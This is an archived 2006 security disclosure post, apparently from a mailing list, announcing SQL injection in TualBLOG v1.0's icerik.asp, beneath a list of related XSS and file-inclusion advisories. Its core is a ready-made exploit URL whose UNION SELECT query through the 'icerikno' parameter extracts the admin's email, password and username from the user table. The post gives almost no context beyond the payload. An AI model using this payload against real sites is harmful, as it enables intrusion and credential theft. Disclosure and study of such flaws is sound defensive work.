Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA21883] emuCMS "query" and "page" Cross-Site Scripting Vulnerabilities

phpQuiz v0.01 design and coding byJule Slootbeek (pagename) Remote File Inclusion

Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability

Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit

From:	Dj_ReMix_20_(at)_hotmail.com <Dj_ReMix_20_(at)_hotmail.com>
Date:	14.09.2006
Subject:	TualBLOG v 1.0 multiple sql injection

# BiyoSecurity.Org

# script name : TualBLOG v 1.0

# Risk : High

# Regards : Dj ReMix

# Thanks : Korsan , Liz0zim

# Vulnerable file : icerik.asp

exp :

http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,
uyeadi+from+tbl_uye+where+uyeno=1


uyeno = 1 or 2( Admin ID )

Bye :=)